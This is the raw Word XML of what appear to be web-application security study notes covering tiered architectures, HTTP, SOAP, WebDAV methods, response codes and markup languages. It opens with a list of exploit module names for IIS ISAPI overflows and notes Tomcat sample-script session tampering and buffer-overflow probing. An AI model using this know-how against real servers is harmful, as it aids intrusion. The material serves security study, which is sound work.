      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS Phone Book Service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windows/isapi/nsiislog_post</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS ISAPI nsiislog.dll ISAPI POST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lastRenderedPageBreak/>
        <w:t>windows/isapi/rsa_webagent_redirect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS ISAPI RSA WebAgent Redirect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windows/isapi/w3who_query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D308EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Microsoft IIS ISAPI w3who.dll Query String Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0038663A">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:tab/>
        <w:t>Apache (and variants)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">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Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apache Scalp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="00C30BE4" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">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Apache Tomcat</w:t>
      </w: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Sample Scripts:</w:t>
      </w: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An example of the second problem is the Sessions Example script shipped with Apache Tomcat. As shown in Figure 17-2, this can be used to get and set arbitrary session variables. If an application running on the server stores sensitive data in a user’s session, an attacker can view this and may be able to interfere with the application’s processing by modifying its value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G3 - Web Enterprise Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>G3a - Design of tiered architectures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E623A0" w:rsidRPr="00E623A0" w:rsidRDefault="00E623A0" w:rsidP="00E623A0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E623A0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The use of a tiered architecture can improve upon Reliability, Performance, and Security. There are three major types of servers in a typical tier architecture environment:</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Web server</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Application server</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Database server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E623A0" w:rsidRPr="00E623A0" w:rsidRDefault="00E623A0" w:rsidP="00E623A0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E623A0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications are going to be exposed to many risks simply by the fact that they must be exposed to the Internet. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00E623A0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">any Web environments are considered demilitarized zones (DMZs), alluding to the idea that they are the fringes of the battlefield and generally less protected than the local network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G3b - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t xml:space="preserve">The concepts of </w:t>
      </w:r>
      <w:r>
        <w:t>logical and physical separation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00E623A0" w:rsidRDefault="00E623A0" w:rsidP="00E623A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E623A0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Logical separation - different services/processes on the same server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00E623A0" w:rsidRDefault="00E623A0" w:rsidP="00E623A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E623A0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Physical separation - different hardware and possibly network segments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G3c - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t xml:space="preserve">Differences between presentation, </w:t>
      </w:r>
      <w:r>
        <w:t>application and database layers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E623A0"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 xml:space="preserve">A Web server is the server responsible for responding to the HTTP requests received from the Web client. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E623A0"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 xml:space="preserve">The application server is the server responsible for performing any necessary server-side logic required to generate the appropriate response. In many cases, these two are identical, although it is possible to separate the two, and there are sometimes benefits to doing so, which I will address shortly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A"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The database server is responsible for the interaction between the application server and the data store.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G4 - Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="003E1B98" w:rsidRDefault="0038663A" w:rsidP="003E1B98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t xml:space="preserve">Web protocols: HTTP, </w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS, SOAP</w:t>
      </w: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Hypertext Transfer Protocol (HTTP)</w:t>
      </w:r>
      <w:r w:rsidR="00E623A0" w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="003E1B98" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hypertext Transfer Protocol (HTTP) is a communications protocol for the transfer of information on the Internet. Its use for retrieving inter-linked text documents (hypertext) led to the establishment of the World Wide Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="003E1B98" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="003E1B98" w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="003E1B98" w:rsidRDefault="00C30BE4" w:rsidP="003E1B98">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hypertext Transfer Protocol over Secure Socket Layer or HTTPS is a URI scheme used to indicate a secure HTTP connection. It is syntactically identical to the http:// scheme normally used for accessing resources using HTTP. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Using an https: URL indicates that HTTP is to be used, but with a different default TCP port (443) and an additional encryption/authentication layer between the HTTP and TCP.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS/SSL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> used as the encryption/authentication layer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="003E1B98" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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SOAP</w:t>
      </w:r>
      <w:r w:rsidR="003E1B98" w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C30BE4" w:rsidRPr="003E1B98" w:rsidRDefault="00C30BE4" w:rsidP="00C30BE4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SOAP is a protocol for exchanging XML-based messages over computer networks, normally using HTTP/HTTPS. SOAP forms the foundation layer of the web services protocol stack providing a basic messaging framework upon which abstract layers can be built.</w:t>
      </w:r>
      <w:r w:rsidR="003E1B98" w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>As a layman's example of how SOAP procedures can be used, a correctly formatted call could be sent to a Web Service enabled web site - for example, a house price database - with the data ranges needed for a search. The site could then return a formatted XML document with all the required results and associated data (prices, location, features, etc). These could then be integrated directly into a third-party site.</w:t>
      </w:r>
      <w:r w:rsidR="003E1B98" w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">There are several different types of messaging patterns in SOAP, but by far the most common is the Remote Procedure Call (RPC) pattern, in which one network node (the client) sends a request message to another node (the server) and the server immediately sends a response message to the client. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G4b - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t>All HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web methods and response codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1B98" w:rsidRPr="003E1B98" w:rsidRDefault="003E1B98" w:rsidP="003E1B98">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP Request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7866"/>
      </w:tblGrid>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HEAD</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Asks for the response identical to the one that would correspond to a GET request, but without the response body. This is useful for retrieving meta-information written in response headers, without having to transport the entire content.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GET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Requests a representation of the specified resource. By far the most common method used on the Web today. Should not be used for operations that cause side-effects (using it for actions in web applications is a common misuse). See safe methods below.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POST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Submits data to be processed (e.g. from an HTML form) to the identified resource. The data is included in the body of the request. This may result in the creation of a new resource or the updates of existing resources or both.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PUT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Uploads a representation of the specified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DELETE</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Deletes the specified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TRACE</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Echoes back the received request, so that a client can see what intermediate servers are adding or changing in the request.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OPTIONS</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Returns the HTTP methods that the server supports for specified URL. This can be used to check the functionality of a web server by requesting '*' instead of a specific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CONNECT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Converts the request connection to a transparent TCP/IP tunnel, usually to facilitate SSL-encrypted communication (HTTPS) through an unencrypted HTTP proxy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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IIS can also use WEBDAV which implements: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7574"/>
      </w:tblGrid>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PROPFIND</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retrieve properties, stored as XML, from a resource. It is also overloaded to allow one to retrieve the collection structure (a.k.a. directory hierarchy) of a remote system.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PROPPATCH</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change and delete multiple properties on a resource in a single atomic act.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MKCOL</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create collections (a.k.a. directory).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COPY</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copy a resource from one URI to another.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MOVE</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move a resource from one URI to another.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LOCK</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put a lock on a resource. WebDAV supports both shared and exclusive locks. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E1B98" w:rsidRPr="00260F22" w:rsidTr="003E1B98">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>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UNLOCK</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To remove a lock from a resource. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003E1B98" w:rsidRPr="003E1B98" w:rsidRDefault="003E1B98" w:rsidP="003E1B98">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00260F22" w:rsidRPr="00260F22" w:rsidRDefault="003E1B98" w:rsidP="003E1B98">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260F22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP Response Codes</w:t>
      </w:r>
      <w:r w:rsidR="00260F22" w:rsidRPr="00260F22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (common)</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w: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843"/>
        <w:gridCol w:w="6440"/>
      </w:tblGrid>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100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Continue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response is sent in some circumstances when a client submits a request containing a body. The response indicates that the request headers were received and that the client should continue sending the body. The server will then return a second response when the request has been completed.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200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OK</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request was successful and the response body contains the result of the request.</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201</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Created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is returned in response to a PUT request to indicate that the request was successful.</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302</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Found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redirects the browser temporarily to a different URL, which is specified in the Location header. The client should revert to the original URL in subsequent requests.</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lastRenderedPageBreak/>
              <w:t>304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Not Modified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instructs the browser to use its cached copy of the requested resource. The server uses the If-Modified-Since and If-None-Match request headers to determine whether the client has the latest version of the resource.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Bad Request</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client submitted an invalid HTTP request. You will probably encounter this when you have modified a request in certain invalid ways, for example by placing a space character into the URL.</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401</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Unauthorized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The server requires HTTP authentication before the request will be granted. The WWW-Authenticate header contains details of the type(s) of authentication supported.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Forbidden</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no one is allowed to access the requested resource, regardless of authentication.</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Not Found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requested resource does not exist.</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405</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Method Not Allowed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method used in the request is not supported for the specified URL. For example, you may receive this status code if you attempt to use the PUT method where it is not supported.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413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Request Entity Too Large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If you are probing for buffer overflow vulnerabilities in native code, and so submitting long strings of data, this indicates that the body of your request is too large for the server to handle.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414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Request URI Too Long</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Similar to the previous response, this indicates that the URL used in the request is too large for the server to handle.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500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Internal Server Error</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server encountered an error fulfilling the request. This normally occurs when you have submitted unexpected input that caused an unhandled error somewhere within the application’s processing. You should review the full contents of the server’s response closely for any details indicating the nature of the error.</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503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Service Unavailable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normally indicates that, although the web server itself is functioning and able to respond to requests, the application accessed via the server is not responding. You should verify whether this is the result of any action that you have performed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>G5 - Web Mark-up Languages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00563B5B" w:rsidRDefault="0038663A" w:rsidP="00563B5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G5a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:t>mark-up languages: HTML and XML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260F22" w:rsidRPr="00563B5B" w:rsidRDefault="00260F22" w:rsidP="00563B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML, which stands for HyperText Markup Language, is the predominant markup language for web pages. It provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists etc as well as for links, quotes, and other items. It allows images and objects to be embedded and can be used to create interactive forms. It is written in the form of HTML elements consisting of "tags" surrounded by angle brackets within the web page content. It can include or can load scripts in languages such as JavaScript which affect the behavior of HTML processors like Web browsers; and Cascading Style Sheets (CSS) to define the appearance and layout of text and other material. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260F22" w:rsidRPr="00563B5B" w:rsidRDefault="00260F22" w:rsidP="00563B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XML (Extensible Markup Language) is a set of rules for encoding documents electronically. It is defined in the XML 1.0 Specification produced by the W3C, and several other related specifications, all gratis open standards.</w:t>
      </w:r>
      <w:r w:rsidR="00563B5B" w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XML's design goals emphasize simplicity, generality, and usability over the Internet. It is a textual data format, with strong support via Unicode for the languages of the world. Although XML's design focuses on documents, it is widely used for the representation of arbitrary data structures, for example in web services. There are many programming interfaces that software developers may use to access XML data, and several schema systems designed to aid in the definition of XML-based languages.</w:t>
      </w:r>
      <w:r w:rsidR="00563B5B" w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> H</w:t>
      </w:r>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>undreds of XML-based la</w:t>
      </w:r>
      <w:r w:rsidR="00563B5B" w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nguages have been developed, </w:t>
      </w:r>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>includ</w:t>
      </w:r>
      <w:r w:rsidR="00563B5B" w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ing RSS, Atom, SOAP, and XHTML. </w:t>
      </w:r>
      <w:r w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XML-based formats have become the default for most office-productivity tools, including Microsoft Office (Office Open XML), OpenOffice.org (Open</w:t>
      </w:r>
      <w:r w:rsidR="00563B5B" w:rsidRPr="00563B5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Document), and Apple's iWork.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>G6 - Web Programming Languages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00C95FAD" w:rsidRDefault="0038663A" w:rsidP="00C95FAD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G6a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
